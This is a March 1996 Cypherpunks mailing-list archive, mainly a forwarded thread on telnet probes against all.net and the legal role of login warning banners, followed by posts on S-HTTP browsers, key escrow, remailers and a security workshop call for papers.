One interesting notion that surfaces in this is what's a "normal" 
automated inquiry for information versus an "attack."  Do I commit 
computer trespass when I finger someone?  Or do I have to try to telnet?  
Is attempting a telnet into a "guest" account OK if I just want to see if 
the machine's policy is to welcome visitors?  Do they have to post "do 
not trespass" signs?

If all.net's policy is really "nobody's allowed to telnet in," they why 
don't they just shutdown the damn telnetd, and be done with it?  Or, if 
they want only "authorized" personnel, why not add sufficient crypto to 
secure the channel?

Anyway, it makes for an interesting read....

**BEGIN FORWARDED MATERIAL**

--------------------------------------------- 
Date: Wed, 13 Mar 1996 
21:25:03 -0500 (EST) >From: Sick Puppy <sikpuppy@maestro.com> Subject: 
Re: IW Mailing List iw/960313

> [Moderator's Note: I believe that the federal computer abuse statutes
> don't require a warning banner.  If they did, than any denial of 
service > attack that ignored responses would be legal.]

In our discussions with the FBI about how we could meet the legal 
requirements for a successful prosecution that would not be thrown out on 
technicalities, the need for a warning statement or warning banner was 
stressed by the FBI.  I don't remember the specifics but the need to have 
a warning banner is related to the freedoms guaranteed by the US 
Constitution and its Amendments.  The FBI mentioned a couple of 
prosecutions by the Secret Service where part of the case was thrown out 
and the whole case was significantly weakened, because there was no 
warning banner. 

I believe that CERT also covers this point in its annual 
conference/seminar for incident response teams.  They usually get a FBI 
agent with experience in the rules of evidence to speak during the lunch 
breaks. 

Maybe there is someone on the list whose recollection on this point is 
more precise than mine.
---------------------------------------------
Date: Wed, 13 Mar 1996 
18:46:52 -0600
>From: Walt Auch <waltauch@hiwaay.net> 
Subject: Re: IW Mailing List iw/960313

Quote:
[Moderator's Note: I believe that the federal computer abuse statutes 
don't require a warning banner.  If they did, than any denial of service 
attack that ignored responses would be legal.]
Unquote

Banners are not REQUIRED, but DOJ has indicated in many conversations 
that they are "looked upon favorably" by the Court.  You do NOT have to 
prove that they were read - much like you don't have to prove a speed 
limit sign was read in order to prove speeding - you should just be able 
to show it was posted.  (Scott Charney is the DOJ person - not sure that 
should be posted.)
--------------------------------------------- 
>From: fc (Fred Cohen)
Subject: More progress
Date: Wed, 13 Mar 1996 23:59:56 -0500 (EST)

So far, we have traced down:

	A breakin at a community college in Pennsylnavia where the
attacker rigged the University computer to automatically telnet to our 
site every 5 minutes. 

	A port scan followed by a series of scores of attempts to telnet 
into our site for over an hour from a University site in Arizona.  The 
attacker has been caught.

	Several IP spoofing attempts that we are tracing down to the 
specific dial-in accounts used to launch the attack.

	An intentional insider corruption of a Web page designed to
turn innocent browsers into launchpads for their attack.  This one was 
tracked down yesterday and has been stopped after recurrences by 
contacting this ISPs ISP and the FBI.

	A web site which is misleading people into telnetting into
our site under the auspices of getting a letter from a self-proclaimed 
computer security expert.

	What appeared to be a systems administrator at a prominant 
university who did a port scan followed by numerous telnets.  It now
looks like this person may not have been authorized by the university to 
do any of this and it has been raised to another level in the University.

	Several other individuals have been tracked down as well.

19:52

> From: "Matthew G. Devost" <mdevost@chelsea.ios.com> ...
> I am concerned over the all.net statement that it will pursue criminal
> conspiracy charges against all those that telnet to their site.  I 
asked > what sort of warning banner was in place and hadn't gotten a 
reply yet
> so I checked to see.  Well, there is NO warning banner.  You simply get 
> a connection refused by foreign host (and I imagine, a email to root at 
> my ISP saying I am an evil hacker!).

The message changed as incidents occured.  Contrary to what previous 
postings indicated, we haven't historically claimed these events as 
attacks.  We simply state that (current form):

	A user at your site has just attempted to telnet into our site. 	
No users from your site are authorized to telnet into this site. 	
We thought you would like to know so you could investigate 	further.  
If more telnets come from your site, this may indicate 	a more 
substantial attempted entry originating from your site, 	and 
should be followed up in more depth and more quickly. 

> Here is my point.  It is obvious that someone (an individual) has a > 
gripe with you or just wants to target your machine, but I would not > 
call the other attempts a conspiracy.  I could post the following
> message to a cancer survivor newsgroup or list:

At this point in time [see above] several different individuals have been 
identified as having intentionally attacked this site during the 
incident.  About 5 individuals are responsible for over 90% of all of the 
attempted entries. 

> 	"Hello all! Just wanted you to know that I have set up a Cancer > 	
Survivors network on my host machine.  It requires telnet access > 	
for now, but we are hoping to find an easier way to access the
> 	computer in the near future.  Please give it a try by telneting > 	
to all.net."

Excellent example.  This would not be a criminal conspiracy unless some 
of the participants became accomplices after the fact by lying about the 
source of the message and actively creating their own similar messages. 
Then they would become co-conspirators.  That's what appears to have 
happened here. 

...
> My point, and I realize I am taking a long time getting there, is that 
> at the very least you should provide a warning banner when folks telnet 
> to you site telling them that an unauthorized telnet attempt will be
> considered an intrusion. 

We express this in our finger daemon: 		No users are allowed on 
this system

In the case of telnet, we don't want people getting that far into our 
system because we believe that such mechanisms may be breakable by high 
volume attacks.  We prefer to stop things at the earliest possible phase 
and to have layered defenses after that. 
---------------------------------------------
Subject: Re: IW Mailing List iw/960313 
Date: Thu, 14 Mar 1996 10:02:56 -0500
>From: "Michael G. Reed" <reed@itd.nrl.navy.mil>

|> Well congrats for sparking the list back to life! I think it is
|> definitely an IW attack at the Class I level, but I would agree with
|> most of the comments from the list that perhaps [all.net is] 
overreacting. 

	Over reacting, no, inflaming the situation, yes.  It is well 
within the rights of all.net to treat attempted telnets to their machine 
as attempted break-ins if the proper notification has been given; but 
personally, I think their handling of the situation is
quite silly.  One does not get up on a soap box and scream and shout to 
the world like this -- it just invites (no, begs) more attacks. Instead, 
you deal with it in the professional manner that system administrators 
have used for years -- contact other admins and deal with the problem 
directly.

	The big problem is *ARE YOU SURE* you have the right people?
IP spoofing is trivial these days (a problem that won't be solved until 
IPv6, if even then) and it would be very easy to mount a concerted attack 
that *NO ONE* would be able to track down unless you start looking at 
backbone router logs (which I seriously doubt are being generated or 
kept) or placing sniffers all over the Internet.

[Moderator's Note:  Apparently all.net has this well covered because of 
their previous efforts in automated vulnerability testing.]

...
	Actually, there are both CERT and DoD bulletins on appropriate 
warning banners.  These banners should (ideally) be displayed *PRIOR* to 
login (ie, before the login prompt), but most OS's today don't allow for 
this and as such the banners are normally displayed in the motd.  For us 
(DoD/USN), the message is as follows (at least this is what is showing up 
on all of our machines):

* * *   WARNING!   * * *

This is a U.S. Government/Department of the Navy
Automated Information System.
This system may be used only for unclassified official business.
Unauthorized use of this system is prohibited by
Title 18, Section 1030, United States Code.

Department of the Navy Automated Information Systems and related 
equipment are intended for the communication, processing and storage of 
U.S. Government information, and are subject to monitoring to ensure 
proper functioning, to protect against improper or unauthorized use or 
access, to verify the presence or performance of applicable security 
features or procedures, and for other like purposes.  Such monitoring may 
result in the acquisition, recording, and analysis of all data being 
communicated, transmitted, processed or stored in this system by a user.  
If monitoring reveals evidence of possible criminal activity, such 
evidence may be provided to law enforcement personnel.

* * *  USE OF THIS SYSTEM CONSTITUTES CONSENT TO SUCH MONITORING.  * * *

Send questions and/or problem reports to root@foobar.mil

|> Let me first start by saying that a telnet attempt is the first and 
most |> obvious step in any electronic intrusion. ...
|> Telnet's only purpose is to establish access. 

	I think this is stretching the law a bit.  Let me give you an 
analogy: Suppose I walk up to a military installation.  At the gate they 
will ask me for my pass, but I don't have one on me.  Now, as long as I 
do not attempt to enter, and leave the grounds at that point, have I done 
anything wrong?  Is my attempt to "break in" illegal?  I would contend 
no.  Now, if I had been trying to scale the fence at the time I was 
detected, that is a COMPLETELY different story, but by following normal 
protocol I am within my rights.  This doesn't preclude handling 
denial-of-service attacks either.  If I continually walk up to the 
military installation and ask for entry without the proper pass, then I 
am *POSSIBLY* breaking the law (disturbing the peace or harassment at the 
minimum) or if there are big signs (which I ignore) stating that 
unauthorized attempts to enter will result in prosecution, then I *AM* 
breaking the law.

|> As for alerting an administrator, it is extremely likely that a person 
|> trying to get into one system also tries to get into dozens of others. ...

	Yes, this is what all system administrators should do.  I am
not saying that systems should hide the fact that they are (or have been) 
attacked, but that they should handle it professionally and not throw a 
tantrum (I'm sorry, but that's what all.net's message looks like to me -- 
a tantrum -- my personal take on reading it).

	Security on the Internet is a *MAJOR* problem today, the
problem is that few people realize this (or to what extent it is a 
problem).  The one good thing coming out of all of all.net's attention to 
this "attack" is the quality discussions about security, the handling of 
threats, and what should be done in the future.

[Moderator's Note: The all.net banner is shown above.]

--------------------------------------------- Date: Thu, 14 Mar 1996 
10:24:03 -0800 (PST) >From: watson@tds.com
Subject: Re: hackers and the law

>[Moderator's Note: I believe that the federal computer abuse statutes 
>don't require a warning banner.  If they did, than any denial of service 
>attack that ignored responses would be legal.]

There was a CERT or CIAC about late 1992, and a sidebar in Cheswick and 
Bellovin that summarizes the fuzzy state of this assertion.  Apparently, 
the attackee has some risk of prosecution under wiretap laws if actions 
are taken against an attacker without proper notice.  The warning banner 
is considered necessary defense against the attacker's lawyers when he 
claims he was "just knocking on the door."  I haven't heard of a clear 
precedent on this.  Probably varies by jurisdiction, phase of the moon, 
etc.  I would encourage those who post on this topic to state their legal 
credentials.

[Moderator's Note: I'll bite - what are your legal credentials?] 
---------------------------------------------

**END FORWARDED MATERIAL**

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 16 Mar 1996 07:36:50 +0800
To: cypherpunks@toad.com
Subject: Re: Interesting Egghead freebee
Message-ID: <9603152004.AA18262@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Alan Olsen <alano@teleport.com>
> Subject: Interesting Egghead freebee

> While at Egghead today, I found out that they are giving away copies of Spry
> Mosaic in a Box. (You have to buy something, but that was why I was there
> anyways...) So far, it seems to be worth about what you pay for it.  It is
> designed to connect you to Compu$lave.
> What has this to do with this list you ask?  The product actually claims to
> support S-HTTP!  (No export warnings on the package and no real info as to
> how it is implemented...  I suspect brand-name snake oil here.)  For those
> of you who do web development and are interested in a client that actually
> supports S-Http (I do not believe the d/lable version does), take a look.
> (It does install alot of crap, like a new Winsock, so be warned.)

Spry Mosaic really does support SHTTP - you can use it to connect to the
SHTTP test pages at Terisa and Commercenet without difficulty, once you've
doped out how to generate and get signed a low-assurance RSA persona
certificate.

I just performed an altavista search for references to "shttp://" (the SHTTP
prefix) and "https://" (the SSL prefix). The results were 1,000 SHTTP
hits, and 20,000 SSL hits.

SHTTP may be technicly superior to SSL level 2.0, but as a commercial
software developer, I know on which side my bread is buttered.





Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@MICROSOFT.com>
Date: Sat, 16 Mar 1996 06:00:57 +0800
To: "'asgaard@sos.sll.se>
Subject: RE: Tim's friend's mildly retarded son
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960315184442Z-6339@red-06-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Asgaard
>
>The reason FDA has not approved this drug is most probably because
>it does not make mildly retarded boys less retarded. But of course,
>it's not up to the state to protect people from wasting their money
>on snake oil. It becomes more difficult to uphold a pure market
>philosophy when it comes to poisonous snake oil or, as is often the
>case with potent drugs, effective oil but which will kill you from
>side effects after a delay. [. . . . . ]
>.................................................
>
>In reference to the "pure" market:
>
>The point is not simply that the State should protect people from
>snake-oil salesmen.
>
>There are many "private" agencies whom one can pay to do the work of
>research on the actual benefits of a drug; companies which which can,
>if one does not have the time or the expert knowledge, perform tests
>and such to establish whether there is any danger involved in taking
>it.  This would be the same kind of work that anyone would need to do
>in any case (information that they would need to have), whether as an
>individual or a private group or a government agency.   
>
>They, too, can do all the work of checking on the safety of the
>product, ensuring that it is good, guaranteeing the reality of any
>positive effects, then handing it over to the their client and saying,
>"there - now, we are satisfied in our judgement that it is not
>dangerous to use it."
>
>The point is that it is not right to prevent, stifle, suffocate, the
>liberty to use one's own resources, to act at one's own discretion and
>make one's own choices in regard of one's own particular circumstance,
>to make independently the judgements necessary to determine the truth
>or falsehood of a statement, or the efficacy of a drug - i.e., it is
>not right to have to "give it up" to the State, allowing no one else to
>engage in the mental exercise and follow-through.
>
>   ..
>Blanc
>I hope I'm not the only one here who thinks so.
>     
>
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Andrew D Meredith" <meredith@ecid.cig.mot.com>
Date: Fri, 15 Mar 1996 20:02:46 +0800
To: cypherpunks@toad.com
Subject: Netscape Registration Wizard is dead
Message-ID: <9603151142.ZM883@jurua.sweng.ecid.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi Folks,

We've just done a quick test on 2.01 and it would seem that the
"Netscape Registration Wizard" is no more.

Cheers

Andy M

--
___________________________________________________________________

Andrew Meredith
Senior Systems Engineer            Tel: (direct) +44(0) 1793 545377
Network Engineering Tools Group    Tel: (main)   +44(0) 1793 541541
Motorola, GSM Products Division    Fax:          +44(0) 1793 512618
16, Euroway, Blagrove   SMTP:             meredith@ecid.cig.mot.com
Swindon, SN5 8YQ, UK    X400: Andrew_Meredith-QSWI016@email.mot.com
___________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 16 Mar 1996 02:27:29 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Why escrow? (was Re: How would Leahy bill affect crypto
Message-ID: <199603151658.LAA06153@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Mar 96 at 19:41, jim bell wrote:


> >Of course that depends how you give your key to an escrow agent. If 
> >it's already escrowed when you buy a phone, for instance...
> 
> That's the real danger with any such legislation.  Individuals can generally 
> only get things that are manufactured for sale.  (You can't buy a car with a 
> 7-cylinder engine, for instance...)  If manufacturers are dissuaded from 
> building a good crypto telephone, then key-escrow can be as "voluntary" as 
> you want and you still won't be able to exercise your rights. 

You might sill be able to buy an unescrowed crypto-phone. If forgeign 
companies start selling them, then the gov't will have a hard time 
preventing domestic companies from manufacturing them and exporting 
them (in theory...) under the legislation.

Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael E. Carboy" <carboy@hooked.net>
Date: Sat, 16 Mar 1996 07:36:51 +0800
To: "'cypherpunks@toad.com>
Subject: NOISE: Remailers
Message-ID: <01BB1268.2BDCA5C0@fish-19.ppp.hooked.net>
MIME-Version: 1.0
Content-Type: text/plain



Has anon.penet.fi recently died???  Seems to have not been responding for the past week or so...

Michael E. Carboy
carboy@hooked.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@mit.edu>
Date: Sat, 16 Mar 1996 05:02:16 +0800
To: (Recipient list suppressed)
Subject: Internet Security Worskhop Call for Papers
Message-ID: <9603151816.AA22063@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain




------- Forwarded Message

From: papers@rpcp.mit.edu (Richard J. Solomon)
Date: Fri, 15 Mar 1996 12:17:23 -0500
To: {Recipient List Suppressed}
Cc: reagle@rpcp.mit.edu, execdir@fnc.gov
Reply-To: papers@rpcp.mit.edu
Subject: Internet Security Call for Papers


                      CALL FOR PAPERS

           INTERNET PRIVACY AND SECURITY WORKSHOP
                   Haystack Observatory, MA
                      May 20-21, 1996

              Privacy and Security Working Group
                   Federal Networking Council

            Research Program on Communications Policy
    Center for Technology, Policy, and Industrial Development
              Massachusetts Institute of Technology


INVITATION

The Privacy and Security Working Group (PSWG) of the Federal  
Networking Council (FNC) and the Research Program on Communications  
Policy of the Center for Technology, Policy, and Industrial 
Development at the Massachusetts Institute of Technology will 
hold an invitational workshop at the Haystack Observatory outside 
of Boston, MA, on May 20-21, 1996. This workshop is intended to bring
Federal, academic and private sector participants together in
collaboration to develop strategies and potential solutions related 
to Internet privacy and security.

Though a principal focus of the workshop will be on the Federal  
portion of the Internet, the FNC recognizes that the Federal  
Internet is tightly coupled with the Global Internet, whose security  
policies, practices, and goals are complementary to those of the  
Federal Government. To define those practices, procedures and goals,  
the PSWG has undertaken two major initiatives:

- The Federal Internet Security Plan (FISP), which was  
  developed as a scalable, continual improvement process, based on  
  common principles and mechanisms compatible with Internet community  
  values and needs; and

- The Collaborations in Internet Security (CIS) project, an  
  effort aimed at testing the strength of agency approaches to  
  security and moving these technologies beyond individual agency  
  networking environments and into both inter-agency and  
  agency-commercial sector communications. The CIS will result in the  
  development of a new and sustainable process for developing,  
  integrating, and deploying security technologies that are  
  interoperable at all levels of the Federal government and within the  
  commercial and academic sectors.

These initiatives are intended to highlight the critical interface  
between Federal and commercial users and developers of Internet  
services and technologies.

OBJECTIVES

This workshop will bring together principal players in the Federal  
and overall Internet community to discuss the problems and  
challenges of privacy and security on the Internet, and will:

- Identify critical issues, requirements, and recommendations  
  related to future Internet privacy and security research and  
  development efforts;

- Describe "best practice" approaches to Internet privacy and  
  security;

- Develop specific strategies for implementing Internet  
  Security programs involving all sectors of the Internet community;

- Extend the Federal Internet Security Plan (FISP) by  
  defining specific implementations; and finally,

- Develop specific strategies for the migration of  
  technologies from the individual RFC unit test stage to the  
  integration of a complete functional managed system in the CIS  
  test/demonstration/pilot projects.


SUBMISSIONS

Abstracts or complete paper drafts related to the topics listed  
above are welcome.  Accepted papers will be a part of the published  
record of the workshop.  All points of view on Federal policies  
affecting Internet privacy and security are welcome. Please make  
all electronic submissions in ASCII format.

For further information or to submit an abstract or paper contact:

     Internet Security and Privacy Workshop c/o Joseph Reagle
     Research Program on Communications Policy
     Massachusetts Institute of Technology
     One Amherst St. (E40-218)
     Cambridge, MA 02139
     Voice: (617) 253-4138.
     Fax:   (617) 253-7326
     papers@rpcp.mit.edu

SCHEDULE and DEADLINES

Call for papers - March 14, 1996
Abstracts Due   - April 14, 1996
Invitations to Participants - April 20, 1996
Revised/Completed papers due - May 19, 1996
Workshop - May 20-21, 1996

PARTICIPANTS

Participation in the workshop is by invitation, based primarily on  
submitted papers and abstracts.  Additional individuals may be  
invited to ensure that participation reflects a broad cross-section  
of the Internet community.

PROGRAM COMMITTEE

Dennis Branstad - Trusted Information Systems (TIS)
Rich Pethia - Computer Emergency Response Team (CERT)
Jeffrey Schiller - Massachusetts Institute of Technology (MIT)
Richard Solomon - Massachusetts Institute of Technology (MIT)
Rick Stevens - Department of Energy /Argonne National Labs (DOE)

STEERING COMMITTEE

Stephen Squires, Defense Advanced Research Projects Agency 
                 (FNC/PSWG Co-Chair)
Dennis Steinauer, National Institute of Standards and Technology  
                 (FNC/PSWG Co-Chair)
Tice DeYoung, National Aeronautics and Space Administration (NASA)
Phillip Dykstra, Army Research Laboratory (ARL)
Mike Green, National Security Agency (NSA)
George Seweryniak, Department of Energy (DOE)
Walter Wiebe, Federal Networking Council (FNC)

                                                         
*********************

BACKGROUND

Federal Internet Security Plan: In September 1995, the PSWG  
published the draft Federal Internet Security Plan (FISP).  The FISP  
is oriented toward a scalable, continual improvement process, based  
on common principles and mechanisms compatible with Internet  
community values and needs.  See <http://www.fnc.gov/SWG.html>.  The  
plan addresses Internet security requirements, including  
interoperability, from the perspective of the goals and objectives  
outlined in the National Performance Review (NPR),   
http://www.npr.gov/.  The Federal Networking Council developed  
this framework in conjunction with its Advisory Committee which  
represents industry, academia, and non-profit sectors.

Action Items, from the FISP, to be addressed during the Workshop:

Internet Security Policy and Policy Support Activities

* Establish overall Internet security policies
* Address security in all Federally supported NII pilots
* Coordinate Internet community involvement
* Establish an ongoing Internet threat database and assessment 
  capability
* Identify legal and law enforcement issues

Internet Security and Technology Development

* Develop an Internet security maturity model
* Develop Internet security architecture
* Enhance Internet security services and protocols
* Develop a "Secure-Out-of-the-Box" endorsement
* Enhance application security

Internet Security Infrastructure

* Establish a set of Internet security interoperability testbeds
* Support privacy, authentication, certificate, and security  
  services pilots
* Establish Internet security testing and evaluation capabilities
* Improve security incident handling capabilities
* Develop security self-assessment capabilities
* Establish effective secure software and document distribution  
  mechanisms

Education and Awareness

* Compile Internet user and site profiles
* Encourage use of available security technologies
* Establish an Internet security information server
* Establish an Internet security symposium/workshop series
* Establish an Internet security fellowship program

Collaborations in Internet Security: With the Federal government's  
ever-increasing dependency on computers and distributed systems,  
there is great urgency for it to develop and employ enhanced  
information system security technologies and practices. At the same  
time, these Federal technologies must interoperate with those of the  
broader Internet community (encompassing the private and academic  
sectors, along with the Federal sector).

In recognition of these needs, the Federal Networking Council's  
Privacy & Security Working Group (FNC/PSWG) has been awarded a  
National Performance Review (NPR) Innovation Fund grant to compare  
and validate agency approaches to security. This Collaborations in  
Internet Security (CIS) project aims to test the strength of these  
technologies beyond individual agency networking environments,  
emphasizing the inter-agency and agency-commercial sector  
communications. The CIS will result in the development of a new and  
sustainable process for developing, integrating, and deploying  
security technology that is interoperable at all levels of the  
Federal Government and within the commercial and academic sectors.

The governing principles behind the Security Testbeds include:  
employment of an open process (with the activities and results open  
to participation and comment by both public and private sector  
participants); a focus on multivendor technologies; an emphasis on  
testing and experimentally deploying security technologies emerging  
from research and private sectors as well as security technologies  
currently in use in the commercial environment; and an underlying  
objective to ensure interoperability among the broad Internet  
community (federal, private, and academic). Initial tests will  
include demonstrations of Kerberos v.5, testing of single-use  
passwords, and digital signatures. For more information, please see  
(http://www.fnc.gov/cis_page.html)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 17 Mar 1996 02:13:03 +0800
To: cypherpunks@toad.com
Subject: Internet Security Worskhop Call for Papers
Message-ID: <v02120d0dad6f673ddcdc@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

X-Sender: reagle@rpcp.mit.edu
Mime-Version: 1.0
Date: Fri, 15 Mar 1996 13:17:08 -0500
To: (Recipient list suppressed)
From: "Joseph M. Reagle Jr." <reagle@mit.edu>
Subject: Internet Security Worskhop Call for Papers



------- Forwarded Message

From: papers@rpcp.mit.edu (Richard J. Solomon)
Date: Fri, 15 Mar 1996 12:17:23 -0500
To: {Recipient List Suppressed}
Cc: reagle@rpcp.mit.edu, execdir@fnc.gov
Reply-To: papers@rpcp.mit.edu
Subject: Internet Security Call for Papers


                      CALL FOR PAPERS

           INTERNET PRIVACY AND SECURITY WORKSHOP
                   Haystack Observatory, MA
                      May 20-21, 1996

              Privacy and Security Working Group
                   Federal Networking Council

            Research Program on Communications Policy
    Center for Technology, Policy, and Industrial Development
              Massachusetts Institute of Technology


INVITATION

The Privacy and Security Working Group (PSWG) of the Federal
Networking Council (FNC) and the Research Program on Communications
Policy of the Center for Technology, Policy, and Industrial
Development at the Massachusetts Institute of Technology will
hold an invitational workshop at the Haystack Observatory outside
of Boston, MA, on May 20-21, 1996. This workshop is intended to bring
Federal, academic and private sector participants together in
collaboration to develop strategies and potential solutions related
to Internet privacy and security.

Though a principal focus of the workshop will be on the Federal
portion of the Internet, the FNC recognizes that the Federal
Internet is tightly coupled with the Global Internet, whose security
policies, practices, and goals are complementary to those of the
Federal Government. To define those practices, procedures and goals,
the PSWG has undertaken two major initiatives:

- The Federal Internet Security Plan (FISP), which was
  developed as a scalable, continual improvement process, based on
  common principles and mechanisms compatible with Internet community
  values and needs; and

- The Collaborations in Internet Security (CIS) project, an
  effort aimed at testing the strength of agency approaches to
  security and moving these technologies beyond individual agency
  networking environments and into both inter-agency and
  agency-commercial sector communications. The CIS will result in the
  development of a new and sustainable process for developing,
  integrating, and deploying security technologies that are
  interoperable at all levels of the Federal government and within the
  commercial and academic sectors.

These initiatives are intended to highlight the critical interface
between Federal and commercial users and developers of Internet
services and technologies.

OBJECTIVES

This workshop will bring together principal players in the Federal
and overall Internet community to discuss the problems and
challenges of privacy and security on the Internet, and will:

- Identify critical issues, requirements, and recommendations
  related to future Internet privacy and security research and
  development efforts;

- Describe "best practice" approaches to Internet privacy and
  security;

- Develop specific strategies for implementing Internet
  Security programs involving all sectors of the Internet community;

- Extend the Federal Internet Security Plan (FISP) by
  defining specific implementations; and finally,

- Develop specific strategies for the migration of
  technologies from the individual RFC unit test stage to the
  integration of a complete functional managed system in the CIS
  test/demonstration/pilot projects.


SUBMISSIONS

Abstracts or complete paper drafts related to the topics listed
above are welcome.  Accepted papers will be a part of the published
record of the workshop.  All points of view on Federal policies
affecting Internet privacy and security are welcome. Please make
all electronic submissions in ASCII format.

For further information or to submit an abstract or paper contact:

     Internet Security and Privacy Workshop c/o Joseph Reagle
     Research Program on Communications Policy
     Massachusetts Institute of Technology
     One Amherst St. (E40-218)
     Cambridge, MA 02139
     Voice: (617) 253-4138.
     Fax:   (617) 253-7326
     papers@rpcp.mit.edu

SCHEDULE and DEADLINES

Call for papers - March 14, 1996
Abstracts Due   - April 14, 1996
Invitations to Participants - April 20, 1996
Revised/Completed papers due - May 19, 1996
Workshop - May 20-21, 1996

PARTICIPANTS

Participation in the workshop is by invitation, based primarily on
submitted papers and abstracts.  Additional individuals may be
invited to ensure that participation reflects a broad cross-section
of the Internet community.

PROGRAM COMMITTEE

Dennis Branstad - Trusted Information Systems (TIS)
Rich Pethia - Computer Emergency Response Team (CERT)
Jeffrey Schiller - Massachusetts Institute of Technology (MIT)
Richard Solomon - Massachusetts Institute of Technology (MIT)
Rick Stevens - Department of Energy /Argonne National Labs (DOE)

STEERING COMMITTEE

Stephen Squires, Defense Advanced Research Projects Agency
                 (FNC/PSWG Co-Chair)
Dennis Steinauer, National Institute of Standards and Technology
                 (FNC/PSWG Co-Chair)
Tice DeYoung, National Aeronautics and Space Administration (NASA)
Phillip Dykstra, Army Research Laboratory (ARL)
Mike Green, National Security Agency (NSA)
George Seweryniak, Department of Energy (DOE)
Walter Wiebe, Federal Networking Council (FNC)


*********************

BACKGROUND

Federal Internet Security Plan: In September 1995, the PSWG
published the draft Federal Internet Security Plan (FISP).  The FISP
is oriented toward a scalable, continual improvement process, based
on common principles and mechanisms compatible with Internet
community values and needs.  See <http://www.fnc.gov/SWG.html>.  The
plan addresses Internet security requirements, including
interoperability, from the perspective of the goals and objectives
outlined in the National Performance Review (NPR),
http://www.npr.gov/.  The Federal Networking Council developed
this framework in conjunction with its Advisory Committee which
represents industry, academia, and non-profit sectors.

Action Items, from the FISP, to be addressed during the Workshop:

Internet Security Policy and Policy Support Activities

* Establish overall Internet security policies
* Address security in all Federally supported NII pilots
* Coordinate Internet community involvement
* Establish an ongoing Internet threat database and assessment
  capability
* Identify legal and law enforcement issues

Internet Security and Technology Development

* Develop an Internet security maturity model
* Develop Internet security architecture
* Enhance Internet security services and protocols
* Develop a "Secure-Out-of-the-Box" endorsement
* Enhance application security

Internet Security Infrastructure

* Establish a set of Internet security interoperability testbeds
* Support privacy, authentication, certificate, and security
  services pilots
* Establish Internet security testing and evaluation capabilities
* Improve security incident handling capabilities
* Develop security self-assessment capabilities
* Establish effective secure software and document distribution
  mechanisms

Education and Awareness

* Compile Internet user and site profiles
* Encourage use of available security technologies
* Establish an Internet security information server
* Establish an Internet security symposium/workshop series
* Establish an Internet security fellowship program

Collaborations in Internet Security: With the Federal government's
ever-increasing dependency on computers and distributed systems,
there is great urgency for it to develop and employ enhanced
information system security technologies and practices. At the same
time, these Federal technologies must interoperate with those of the
broader Internet community (encompassing the private and academic
sectors, along with the Federal sector).

In recognition of these needs, the Federal Networking Council's
Privacy & Security Working Group (FNC/PSWG) has been awarded a
National Performance Review (NPR) Innovation Fund grant to compare
and validate agency approaches to security. This Collaborations in
Internet Security (CIS) project aims to test the strength of these
technologies beyond individual agency networking environments,
emphasizing the inter-agency and agency-commercial sector
communications. The CIS will result in the development of a new and
sustainable process for developing, integrating, and deploying
security technology that is interoperable at all levels of the
Federal Government and within the commercial and academic sectors.

The governing principles behind the Security Testbeds include:
employment of an open process (with the activities and results open
to participation and comment by both public and private sector
participants); a focus on multivendor technologies; an emphasis on
testing and experimentally deploying security technologies emerging
from research and private sectors as well as security technologies
currently in use in the commercial environment; and an underlying
objective to ensure interoperability among the broad Internet
community (federal, private, and academic). Initial tests will
include demonstrations of Kerberos v.5, testing of single-use
passwords, and digital signatures. For more information, please see
(http://www.fnc.gov/cis_page.html)

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 16 Mar 1996 08:06:55 +0800
To: cypherpunks@toad.com
Subject: Re: Interesting Egghead freebee
Message-ID: <2.2.32.19960315212951.008b4d54@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:37 AM 3/15/96 -6, Peter Trei wrote:

>Spry Mosaic really does support SHTTP - you can use it to connect to the
>SHTTP test pages at Terisa and Commercenet without difficulty, once you've
>doped out how to generate and get signed a low-assurance RSA persona
>certificate.

After I posted about it, I did a little more digging and checked out the
S-HTTP portion of the code.  Seems to work pretty well.  (I was a bit
surprised to see that the Personna cert generation saved the information off
in a text file, instead of using the bundled e-mail client.  The docs on
this process were pretty sketchy as well...)

>I just performed an altavista search for references to "shttp://" (the SHTTP
>prefix) and "https://" (the SSL prefix). The results were 1,000 SHTTP
>hits, and 20,000 SSL hits.
>
>SHTTP may be technicly superior to SSL level 2.0, but as a commercial
>software developer, I know on which side my bread is buttered.

My reasons for installing it had little to do with S-HTTP (but it was a nice
